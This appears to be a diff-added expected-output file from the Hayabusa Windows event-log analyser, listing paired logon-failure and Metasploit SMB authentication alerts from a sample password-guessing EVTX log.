+2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R5ilFaQlemZUSNun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JOJnv9vFdqr2VSQC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rXaoVN7FvJ5rRDUF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kaFCT5QYFfmJpEC1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kOdVfL4XUTLp60tC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wFQSXjz0JTlkwpBu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sgAVlnENp6IzRRDr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JLkeKKFVP5vJjPtl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EqLXdGmr45vGpu3E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m7uTpMLqPgenJdRb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FQn7NqRzpGtjQdfv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8F8EZLHQtEWkeob1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5joxW81M9vcAfbJw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iMfmQF3xsaV5SQVZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQe9VL8eeco0SdPW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MnMbxQEuczrnMLKc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3DWOiTIp6JQLq9Vz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E1ORteg467kiFxmD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EoVhHZ2lkyAEx0w9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IMSqYaVVGR5v3bXr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hEEJ05nL0lyatWKL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SgrcS1NqwVJSEv31  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CCNTu1A6c6myngXd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YLx5Hv5GmdvsO9SE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VtS3KUkTVoAWGqbW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7DxfDEwc6ykrmddu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m8yKyocZwOY574pe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JfdmcsxnDHRxJYAA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: euxBOcdse8NjSzTd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dw7RZh5jKuRcM1xw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zIyozsYA1Mn27gl7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vhJopROjHZi6T8aF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QZ6XuZO6fIMg52tV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tvAYEepvDwz93ezW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Er95vLjet49OmSQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OKkMGZ5on5L26cip  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dp5dq3YYmmLxperL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: klkWqfYoNQQHRISX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q0EekPO3q6qRfq3i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gfG1x6sL4Aqlj7TK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: owSUehMmDEhijkfl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J3xBPT5WiuvmPZHe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gIufEPz8FBVd5yKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Blruxd110NvZjof  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0VsPitzItsjU3Y59  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HEq6vk4nTe3weSOP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
